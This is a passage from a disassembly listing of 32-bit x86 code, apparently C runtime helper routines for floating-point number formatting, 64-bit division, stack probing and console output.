mov ebx, [ebx+4]
inc esi
test ebx, ebx
jge short loc_4110FF
neg ebx
cmp [ebp+arg_8], 0
jnz short loc_4110E6
cmp [ebp+arg_4], ebx
jl short loc_4110E9
loc_4110E6: ; CODE XREF: sub_41101E+C1�j
mov [ebp+arg_4], ebx
loc_4110E9: ; CODE XREF: sub_41101E+C6�j
mov edi, [ebp+arg_4]
mov eax, esi
call sub_410A1B
push edi
push 30h
push esi
call sub_407B70
add esp, 0Ch
loc_4110FF: ; CODE XREF: sub_41101E+9B�j
; sub_41101E+B9�j
cmp [ebp+var_4], 0
jz short loc_41110C
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_41110C: ; CODE XREF: sub_41101E+E5�j
xor eax, eax
loc_41110E: ; CODE XREF: sub_41101E+48�j
pop edi
pop esi
pop ebx
leave
retn
sub_41101E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411113 proc near ; CODE XREF: sub_4112C4+24�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_1C = byte ptr -1Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
push 16h
pop esi
push esi
lea ecx, [ebp+var_1C]
push ecx
lea ecx, [ebp+var_2C]
push ecx
push dword ptr [eax+4]
push dword ptr [eax]
call sub_411771
xor ebx, ebx
add esp, 14h
cmp edi, ebx
jnz short loc_411163
loc_41114B: ; CODE XREF: sub_411113+55�j
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov [eax], esi
call sub_402F39
add esp, 14h
mov eax, esi
jmp short loc_4111BD
; ---------------------------------------------------------------------------
loc_411163: ; CODE XREF: sub_411113+36�j
mov eax, [ebp+arg_8]
cmp eax, ebx
jbe short loc_41114B
cmp eax, 0FFFFFFFFh
jnz short loc_411173
or eax, eax
jmp short loc_41117E
; ---------------------------------------------------------------------------
loc_411173: ; CODE XREF: sub_411113+5A�j
xor ecx, ecx
cmp [ebp+var_2C], 2Dh
setz cl
sub eax, ecx
loc_41117E: ; CODE XREF: sub_411113+5E�j
mov esi, [ebp+arg_C]
lea ecx, [ebp+var_2C]
push ecx
mov ecx, [ebp+var_28]
add ecx, esi
push ecx
push eax
xor eax, eax
cmp [ebp+var_2C], 2Dh
setz al
add eax, edi
push eax
call sub_4115F9
add esp, 10h
cmp eax, ebx
jz short loc_4111A8
mov [edi], bl
jmp short loc_4111BD
; ---------------------------------------------------------------------------
loc_4111A8: ; CODE XREF: sub_411113+8F�j
push [ebp+arg_10]
lea eax, [ebp+var_2C]
push ebx
push esi
push [ebp+arg_8]
mov ecx, edi
call sub_41101E
add esp, 10h
loc_4111BD: ; CODE XREF: sub_411113+4E�j
; sub_411113+93�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_411113 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4111CC proc near ; CODE XREF: sub_4112C4+4A�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 30h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
push 16h
pop edi
push edi
lea ecx, [ebp+var_1C]
push ecx
lea ecx, [ebp+var_30]
push ecx
push dword ptr [eax+4]
push dword ptr [eax]
call sub_411771
xor ebx, ebx
add esp, 14h
cmp esi, ebx
jnz short loc_41121F
loc_411204: ; CODE XREF: sub_4111CC+58�j
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov [eax], edi
call sub_402F39
add esp, 14h
mov eax, edi
jmp loc_4112B5
; ---------------------------------------------------------------------------
loc_41121F: ; CODE XREF: sub_4111CC+36�j
mov ecx, [ebp+arg_8]
cmp ecx, ebx
jbe short loc_411204
mov eax, [ebp+var_2C]
dec eax
mov [ebp+var_20], eax
xor eax, eax
cmp [ebp+var_30], 2Dh
setz al
cmp ecx, 0FFFFFFFFh
lea edi, [eax+esi]
jnz short loc_411242
or ecx, ecx
jmp short loc_411244
; ---------------------------------------------------------------------------
loc_411242: ; CODE XREF: sub_4111CC+70�j
sub ecx, eax
loc_411244: ; CODE XREF: sub_4111CC+74�j
lea eax, [ebp+var_30]
push eax
push [ebp+arg_C]
push ecx
push edi
call sub_4115F9
add esp, 10h
cmp eax, ebx
jz short loc_41125D
mov [esi], bl
jmp short loc_4112B5
; ---------------------------------------------------------------------------
loc_41125D: ; CODE XREF: sub_4111CC+8B�j
mov eax, [ebp+var_2C]
dec eax
cmp [ebp+var_20], eax
setl cl
cmp eax, 0FFFFFFFCh
jl short loc_411299
cmp eax, [ebp+arg_C]
jge short loc_411299
cmp cl, bl
jz short loc_41127F
loc_411275: ; CODE XREF: sub_4111CC+AE�j
mov al, [edi]
inc edi
test al, al
jnz short loc_411275
mov [edi-2], bl
loc_41127F: ; CODE XREF: sub_4111CC+A7�j
push [ebp+arg_14]
lea eax, [ebp+var_30]
push 1
push [ebp+arg_C]
mov ecx, esi
push [ebp+arg_8]
call sub_41101E
add esp, 10h
jmp short loc_4112B5
; ---------------------------------------------------------------------------
loc_411299: ; CODE XREF: sub_4111CC+9E�j
; sub_4111CC+A3�j
push [ebp+arg_14]
lea eax, [ebp+var_30]
push 1
push eax
push [ebp+arg_10]
mov eax, esi
push [ebp+arg_C]
push [ebp+arg_8]
call sub_410A54
add esp, 18h
loc_4112B5: ; CODE XREF: sub_4111CC+4E�j
; sub_4111CC+8F�j ...
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_4111CC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4112C4 proc near ; CODE XREF: sub_41134A+17�p
; DATA XREF: sub_40F70B+37�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
mov eax, [ebp+arg_C]
cmp eax, 65h
jz short loc_41132E
cmp eax, 45h
jz short loc_41132E
cmp eax, 66h
jnz short loc_4112F2
push [ebp+arg_18]
push [ebp+arg_10]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_411113
add esp, 14h
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4112F2: ; CODE XREF: sub_4112C4+13�j
cmp eax, 61h
jz short loc_411315
cmp eax, 41h
jz short loc_411315
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4111CC
jmp short loc_411345
; ---------------------------------------------------------------------------
loc_411315: ; CODE XREF: sub_4112C4+31�j
; sub_4112C4+36�j
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_410CAD
jmp short loc_411345
; ---------------------------------------------------------------------------
loc_41132E: ; CODE XREF: sub_4112C4+9�j
; sub_4112C4+E�j
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_410BC1
loc_411345: ; CODE XREF: sub_4112C4+4F�j
; sub_4112C4+68�j
add esp, 18h
pop ebp
retn
sub_4112C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41134A proc near ; DATA XREF: sub_40F70B�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push 0
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4112C4
add esp, 1Ch
pop ebp
retn
sub_41134A endp
; =============== S U B R O U T I N E =======================================
sub_41136B proc near ; CODE XREF: sub_40F76B+16�p
push esi
push 30000h
push 10000h
xor esi, esi
push esi
call sub_4118FF
add esp, 0Ch
test eax, eax
jz short loc_411392
push esi
push esi
push esi
push esi
push esi
call sub_402E3D
add esp, 14h
loc_411392: ; CODE XREF: sub_41136B+18�j
pop esi
retn
sub_41136B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411394 proc near ; CODE XREF: sub_4113D0:loc_4113F4�j
var_18 = qword ptr -18h
var_10 = qword ptr -10h
var_8 = qword ptr -8
push ebp
mov ebp, esp
sub esp, 18h
fld ds:dbl_41EE70
fstp [ebp+var_10]
fld ds:dbl_41EE68
fstp [ebp+var_18]
fld [ebp+var_18]
fdiv [ebp+var_10]
fmul [ebp+var_10]
fsubr [ebp+var_18]
fstp [ebp+var_8]
fld1
fcomp [ebp+var_8]
fnstsw ax
test ah, 5
jp short loc_4113CC
xor eax, eax
inc eax
leave
retn
; ---------------------------------------------------------------------------
loc_4113CC: ; CODE XREF: sub_411394+31�j
xor eax, eax
leave
retn
sub_411394 endp
; =============== S U B R O U T I N E =======================================
sub_4113D0 proc near ; CODE XREF: sub_40F76B+5�p
push offset aKernel32 ; "KERNEL32"
call ds:dword_41D0E4
test eax, eax
jz short loc_4113F4
push offset aIsprocessorfea ; "IsProcessorFeaturePresent"
push eax
call ds:dword_41D0EC
test eax, eax
jz short loc_4113F4
push 0
call eax
retn
; ---------------------------------------------------------------------------
loc_4113F4: ; CODE XREF: sub_4113D0+D�j
; sub_4113D0+1D�j
jmp sub_411394
sub_4113D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_411400 proc near ; CODE XREF: sub_4104B0+11�j
; J8@F_7_S:004104D7�j ...
push ecx
lea ecx, [esp+4]
sub ecx, eax
sbb eax, eax
not eax
and ecx, eax
mov eax, esp
and eax, 0FFFFF000h
loc_411414: ; CODE XREF: sub_411400+29�j
cmp ecx, eax
jb short loc_411422
mov eax, ecx
pop ecx
xchg eax, esp
mov eax, [eax]
mov [esp+0], eax
retn
; ---------------------------------------------------------------------------
loc_411422: ; CODE XREF: sub_411400+16�j
sub eax, 1000h
test [eax], eax
jmp short loc_411414
sub_411400 endp
; =============== S U B R O U T I N E =======================================
sub_41142B proc near ; CODE XREF: sub_4104DC+24�p
xor eax, eax
push eax
push eax
push 3
push eax
push 3
push 40000000h
push offset aConout ; "CONOUT$"
call ds:dword_41D06C
mov ds:dword_424224, eax
retn
sub_41142B endp
; =============== S U B R O U T I N E =======================================
sub_41144A proc near ; DATA XREF: J8@F_7_S:0041D2E0�o
mov eax, ds:dword_424224
cmp eax, 0FFFFFFFFh
push esi
mov esi, ds:dword_41D0DC
jz short loc_411463
cmp eax, 0FFFFFFFEh
jz short loc_411463
push eax
call esi
loc_411463: ; CODE XREF: sub_41144A+F�j
; sub_41144A+14�j
mov eax, ds:dword_424220
cmp eax, 0FFFFFFFFh
jz short loc_411475
cmp eax, 0FFFFFFFEh
jz short loc_411475
push eax
call esi
loc_411475: ; CODE XREF: sub_41144A+21�j
; sub_41144A+26�j
pop esi
retn
sub_41144A endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411480 proc near ; CODE XREF: sub_410CAD+102�p
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push edi
mov edi, [ebp+arg_0]
xor eax, eax
or ecx, 0FFFFFFFFh
repne scasb
add ecx, 1
neg ecx
sub edi, 1
mov al, [ebp+arg_4]
std
repne scasb
add edi, 1
cmp [edi], al
jz short loc_4114A7
xor eax, eax
jmp short loc_4114A9
; ---------------------------------------------------------------------------
loc_4114A7: ; CODE XREF: sub_411480+21�j
mov eax, edi
loc_4114A9: ; CODE XREF: sub_411480+25�j
cld
pop edi
leave
retn
sub_411480 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4114AD proc near ; CODE XREF: sub_4109C4+15�p
var_28 = byte ptr -28h
var_24 = byte ptr -24h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 28h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
push [ebp+arg_8]
mov edi, [ebp+arg_4]
lea ecx, [ebp+var_24]
call sub_40271F
lea eax, [ebp+var_24]
push eax
xor ebx, ebx
push ebx
push ebx
push ebx
push ebx
push edi
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_10]
push eax
call sub_4123ED
mov [ebp+var_14], eax
lea eax, [ebp+var_10]
push esi
push eax
call sub_411969
add esp, 28h
test byte ptr [ebp+var_14], 3
jnz short loc_41152A
cmp eax, 1
jnz short loc_411515
loc_411504: ; CODE XREF: sub_4114AD+87�j
cmp [ebp+var_18], bl
jz short loc_411510
mov eax, [ebp+var_1C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_411510: ; CODE XREF: sub_4114AD+5A�j
push 3
loc_411512: ; CODE XREF: sub_4114AD+7B�j
pop eax
jmp short loc_411544
; ---------------------------------------------------------------------------
loc_411515: ; CODE XREF: sub_4114AD+55�j
cmp eax, 2
jnz short loc_411536
loc_41151A: ; CODE XREF: sub_4114AD+81�j
cmp [ebp+var_18], bl
jz short loc_411526
mov eax, [ebp+var_1C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_411526: ; CODE XREF: sub_4114AD+70�j
push 4
jmp short loc_411512
; ---------------------------------------------------------------------------
loc_41152A: ; CODE XREF: sub_4114AD+50�j
test byte ptr [ebp+var_14], 1
jnz short loc_41151A
test byte ptr [ebp+var_14], 2
jnz short loc_411504
loc_411536: ; CODE XREF: sub_4114AD+6B�j
cmp [ebp+var_18], bl
jz short loc_411542
mov eax, [ebp+var_1C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_411542: ; CODE XREF: sub_4114AD+8C�j
xor eax, eax
loc_411544: ; CODE XREF: sub_4114AD+66�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_4114AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411553 proc near ; CODE XREF: sub_4109C4+2E�p
var_28 = byte ptr -28h
var_24 = byte ptr -24h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 28h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
push [ebp+arg_8]
mov edi, [ebp+arg_4]
lea ecx, [ebp+var_24]
call sub_40271F
lea eax, [ebp+var_24]
push eax
xor ebx, ebx
push ebx
push ebx
push ebx
push ebx
push edi
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_10]
push eax
call sub_4123ED
mov [ebp+var_14], eax
lea eax, [ebp+var_10]
push esi
push eax
call sub_411EAB
add esp, 28h
test byte ptr [ebp+var_14], 3
jnz short loc_4115D0
cmp eax, 1
jnz short loc_4115BB
loc_4115AA: ; CODE XREF: sub_411553+87�j
cmp [ebp+var_18], bl
jz short loc_4115B6
mov eax, [ebp+var_1C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_4115B6: ; CODE XREF: sub_411553+5A�j
push 3
loc_4115B8: ; CODE XREF: sub_411553+7B�j
pop eax
jmp short loc_4115EA
; ---------------------------------------------------------------------------
loc_4115BB: ; CODE XREF: sub_411553+55�j
cmp eax, 2
jnz short loc_4115DC
loc_4115C0: ; CODE XREF: sub_411553+81�j
cmp [ebp+var_18], bl
jz short loc_4115CC
mov eax, [ebp+var_1C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_4115CC: ; CODE XREF: sub_411553+70�j
push 4
jmp short loc_4115B8
; ---------------------------------------------------------------------------
loc_4115D0: ; CODE XREF: sub_411553+50�j
test byte ptr [ebp+var_14], 1
jnz short loc_4115C0
test byte ptr [ebp+var_14], 2
jnz short loc_4115AA
loc_4115DC: ; CODE XREF: sub_411553+6B�j
cmp [ebp+var_18], bl
jz short loc_4115E8
mov eax, [ebp+var_1C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_4115E8: ; CODE XREF: sub_411553+8C�j
xor eax, eax
loc_4115EA: ; CODE XREF: sub_411553+66�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_411553 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4115F9 proc near ; CODE XREF: sub_410BC1+96�p
; sub_411113+85�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_C]
push ebx
push esi
mov esi, [ebp+arg_0]
xor ebx, ebx
cmp esi, ebx
push edi
mov edi, [ecx+0Ch]
jnz short loc_41162C
loc_41160E: ; CODE XREF: sub_4115F9+36�j
call sub_4057D3
push 16h
pop esi
mov [eax], esi
loc_411618: ; CODE XREF: sub_4115F9+59�j
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402F39
add esp, 14h
mov eax, esi
jmp loc_4116B1
; ---------------------------------------------------------------------------
loc_41162C: ; CODE XREF: sub_4115F9+13�j
cmp [ebp+arg_4], ebx
jbe short loc_41160E
mov edx, [ebp+arg_8]
cmp edx, ebx
mov [esi], bl
jle short loc_41163E
mov eax, edx
jmp short loc_411640
; ---------------------------------------------------------------------------
loc_41163E: ; CODE XREF: sub_4115F9+3F�j
xor eax, eax
loc_411640: ; CODE XREF: sub_4115F9+43�j
inc eax
cmp [ebp+arg_4], eax
ja short loc_411654
call sub_4057D3
push 22h
pop ecx
mov [eax], ecx
mov esi, ecx
jmp short loc_411618
; ---------------------------------------------------------------------------
loc_411654: ; CODE XREF: sub_4115F9+4B�j
cmp edx, ebx
mov byte ptr [esi], 30h
lea eax, [esi+1]
jle short loc_411678
loc_41165E: ; CODE XREF: sub_4115F9+7A�j
mov cl, [edi]
cmp cl, bl
jz short loc_41166A
movsx ecx, cl
inc edi
jmp short loc_41166D
; ---------------------------------------------------------------------------
loc_41166A: ; CODE XREF: sub_4115F9+69�j
push 30h
pop ecx
loc_41166D: ; CODE XREF: sub_4115F9+6F�j
mov [eax], cl
inc eax
dec edx
cmp edx, ebx
jg short loc_41165E
mov ecx, [ebp+arg_C]
loc_411678: ; CODE XREF: sub_4115F9+63�j
cmp edx, ebx
mov [eax], bl
jl short loc_411690
cmp byte ptr [edi], 35h
jl short loc_411690
jmp short loc_411688
; ---------------------------------------------------------------------------
loc_411685: ; CODE XREF: sub_4115F9+93�j
mov byte ptr [eax], 30h
loc_411688: ; CODE XREF: sub_4115F9+8A�j
dec eax
cmp byte ptr [eax], 39h
jz short loc_411685
inc byte ptr [eax]
loc_411690: ; CODE XREF: sub_4115F9+83�j
; sub_4115F9+88�j
cmp byte ptr [esi], 31h
jnz short loc_41169A
inc dword ptr [ecx+4]
jmp short loc_4116AF
; ---------------------------------------------------------------------------
loc_41169A: ; CODE XREF: sub_4115F9+9A�j
lea edi, [esi+1]
push edi
call sub_404130
inc eax
push eax
push edi
push esi
call sub_407370
add esp, 10h
loc_4116AF: ; CODE XREF: sub_4115F9+9F�j
xor eax, eax
loc_4116B1: ; CODE XREF: sub_4115F9+2E�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4115F9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4116B6 proc near ; CODE XREF: sub_411771+24�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov edx, [ebp+arg_4]
movzx eax, word ptr [edx+6]
push ebx
mov ecx, eax
push esi
push edi
shr ecx, 4
and eax, 8000h
mov edi, 7FFh
and ecx, edi
mov [ebp+arg_4], eax
mov eax, [edx+4]
mov edx, [edx]
movzx ebx, cx
mov esi, 80000000h
and eax, 0FFFFFh
test ebx, ebx
mov [ebp+var_4], esi
jz short loc_411704
cmp ebx, edi
jz short loc_4116FD
add ecx, 3C00h
jmp short loc_411725
; ---------------------------------------------------------------------------
loc_4116FD: ; CODE XREF: sub_4116B6+3D�j
mov edi, 7FFFh
jmp short loc_411728
; ---------------------------------------------------------------------------
loc_411704: ; CODE XREF: sub_4116B6+39�j
xor ebx, ebx
cmp eax, ebx
jnz short loc_41171C
cmp edx, ebx
jnz short loc_41171C
mov eax, [ebp+arg_0]
mov cx, word ptr [ebp+arg_4]
mov [eax+4], ebx
mov [eax], ebx
jmp short loc_411768
; ---------------------------------------------------------------------------
loc_41171C: ; CODE XREF: sub_4116B6+52�j
; sub_4116B6+56�j
add ecx, 3C01h
mov [ebp+var_4], ebx
loc_411725: ; CODE XREF: sub_4116B6+45�j
movzx edi, cx
loc_411728: ; CODE XREF: sub_4116B6+4C�j
mov ecx, edx
shr ecx, 15h
shl eax, 0Bh
or ecx, eax
or ecx, [ebp+var_4]
mov eax, [ebp+arg_0]
shl edx, 0Bh
test ecx, esi
mov [eax+4], ecx
mov [eax], edx
jnz short loc_411763
loc_411744: ; CODE XREF: sub_4116B6+AB�j
mov ecx, [eax]
mov edx, [eax+4]
mov ebx, ecx
add edx, edx
shr ebx, 1Fh
or edx, ebx
add ecx, ecx
add edi, 0FFFFh
test edx, esi
mov [eax+4], edx
mov [eax], ecx
jz short loc_411744
loc_411763: ; CODE XREF: sub_4116B6+8C�j
mov ecx, [ebp+arg_4]
or ecx, edi
loc_411768: ; CODE XREF: sub_4116B6+64�j
pop edi
pop esi
mov [eax+8], cx
pop ebx
leave
retn
sub_4116B6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411771 proc near ; CODE XREF: sub_410BC1+2A�p
; sub_411113+2A�p ...
var_30 = dword ptr -30h
var_2C = word ptr -2Ch
var_2A = byte ptr -2Ah
var_28 = byte ptr -28h
var_10 = byte ptr -10h
var_4 = dword ptr -4
arg_0 = byte ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 30h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_C]
push ebx
mov ebx, [ebp+arg_8]
push esi
mov [ebp+var_30], eax
push edi
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_10]
push eax
call sub_4116B6
pop ecx
pop ecx
lea eax, [ebp+var_2C]
push eax
push 0
push 11h
sub esp, 0Ch
lea esi, [ebp+var_10]
mov edi, esp
movsd
movsd
movsw
call sub_412AB1
mov esi, [ebp+var_30]
mov [ebx+8], eax
movsx eax, [ebp+var_2A]
mov [ebx], eax
movsx eax, [ebp+var_2C]
mov [ebx+4], eax
lea eax, [ebp+var_28]
push eax
push [ebp+arg_10]
push esi
call sub_4076D5
add esp, 24h
test eax, eax
jz short loc_4117EB
xor eax, eax
push eax
push eax
push eax
push eax
push eax
call sub_402E3D
add esp, 14h
loc_4117EB: ; CODE XREF: sub_411771+69�j
mov ecx, [ebp+var_4]
pop edi
mov [ebx+0Ch], esi
pop esi
mov eax, ebx
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_411771 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_411800 proc near ; CODE XREF: sub_410CAD+2F7�p
; sub_410CAD+31D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push edi
push esi
push ebp
xor edi, edi
xor ebp, ebp
mov eax, [esp+0Ch+arg_4]
or eax, eax
jge short loc_411824
inc edi
inc ebp
mov edx, [esp+0Ch+arg_0]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_4], eax
mov [esp+0Ch+arg_0], edx
loc_411824: ; CODE XREF: sub_411800+D�j
mov eax, [esp+0Ch+arg_C]
or eax, eax
jge short loc_411840
inc edi
mov edx, [esp+0Ch+arg_8]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_C], eax
mov [esp+0Ch+arg_8], edx
loc_411840: ; CODE XREF: sub_411800+2A�j
or eax, eax
jnz short loc_41186C
mov ecx, [esp+0Ch+arg_8]
mov eax, [esp+0Ch+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+0Ch+arg_0]
div ecx
mov esi, eax
mov eax, ebx
mul [esp+0Ch+arg_8]
mov ecx, eax
mov eax, esi
mul [esp+0Ch+arg_8]
add edx, ecx
jmp short loc_4118B3
; ---------------------------------------------------------------------------
loc_41186C: ; CODE XREF: sub_411800+42�j
mov ebx, eax
mov ecx, [esp+0Ch+arg_8]
mov edx, [esp+0Ch+arg_4]
mov eax, [esp+0Ch+arg_0]
loc_41187A: ; CODE XREF: sub_411800+84�j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_41187A
div ecx
mov esi, eax
mul [esp+0Ch+arg_C]
mov ecx, eax
mov eax, [esp+0Ch+arg_8]
mul esi
add edx, ecx
jb short loc_4118A8
cmp edx, [esp+0Ch+arg_4]
ja short loc_4118A8
jb short loc_4118B1
cmp eax, [esp+0Ch+arg_0]
jbe short loc_4118B1
loc_4118A8: ; CODE XREF: sub_411800+98�j
; sub_411800+9E�j
dec esi
sub eax, [esp+0Ch+arg_8]
sbb edx, [esp+0Ch+arg_C]
loc_4118B1: ; CODE XREF: sub_411800+A0�j
; sub_411800+A6�j
xor ebx, ebx
loc_4118B3: ; CODE XREF: sub_411800+6A�j
sub eax, [esp+0Ch+arg_0]
sbb edx, [esp+0Ch+arg_4]
dec ebp
jns short loc_4118C5
neg edx
neg eax
sbb edx, 0
loc_4118C5: ; CODE XREF: sub_411800+BC�j
mov ecx, edx
mov edx, ebx
mov ebx, ecx
mov ecx, eax
mov eax, esi
dec edi
jnz short loc_4118D9
neg edx
neg eax
sbb edx, 0
loc_4118D9: ; CODE XREF: sub_411800+D0�j
pop ebp
pop esi
pop edi
retn 10h
sub_411800 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4118E0 proc near ; CODE XREF: sub_410CAD+1EA�p
; sub_410CAD+23E�p ...
cmp cl, 40h
jnb short loc_4118FA
cmp cl, 20h
jnb short loc_4118F0
shrd eax, edx, cl
shr edx, cl
retn
; ---------------------------------------------------------------------------
loc_4118F0: ; CODE XREF: sub_4118E0+8�j
mov eax, edx
xor edx, edx
and cl, 1Fh
shr eax, cl
retn
; ---------------------------------------------------------------------------
loc_4118FA: ; CODE XREF: sub_4118E0+3�j
xor eax, eax
xor edx, edx
retn
sub_4118E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4118FF proc near ; CODE XREF: sub_41136B+E�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_8]
mov ecx, [ebp+arg_4]
and eax, 0FFF7FFFFh
and ecx, eax
test ecx, 0FCF0FCE0h
push esi
jz short loc_411949
push edi
mov edi, [ebp+arg_0]
xor esi, esi
cmp edi, esi
jz short loc_41192D
push esi
push esi
call sub_4134A7
pop ecx
pop ecx
mov [edi], eax
loc_41192D: ; CODE XREF: sub_4118FF+21�j
call sub_4057D3
push 16h
pop edi
push esi
push esi
push esi
push esi
push esi
mov [eax], edi
call sub_402F39
add esp, 14h
mov eax, edi
pop edi
jmp short loc_411966
; ---------------------------------------------------------------------------
loc_411949: ; CODE XREF: sub_4118FF+17�j
mov esi, [ebp+arg_0]
test esi, esi
push eax
push [ebp+arg_4]
jz short loc_41195D
call sub_4134A7
mov [esi], eax
jmp short loc_411962
; ---------------------------------------------------------------------------
loc_41195D: ; CODE XREF: sub_4118FF+53�j
call sub_4134A7
loc_411962: ; CODE XREF: sub_4118FF+5C�j
pop ecx
pop ecx
xor eax, eax
loc_411966: ; CODE XREF: sub_4118FF+48�j
pop esi
pop ebp
retn
sub_4118FF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411969 proc near ; CODE XREF: sub_4114AD+44�p
var_2C = byte ptr -2Ch
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, [ebp+arg_0]
movzx ecx, word ptr [eax+0Ah]
push ebx
mov ebx, ecx
and ecx, 8000h
mov [ebp+var_14], ecx
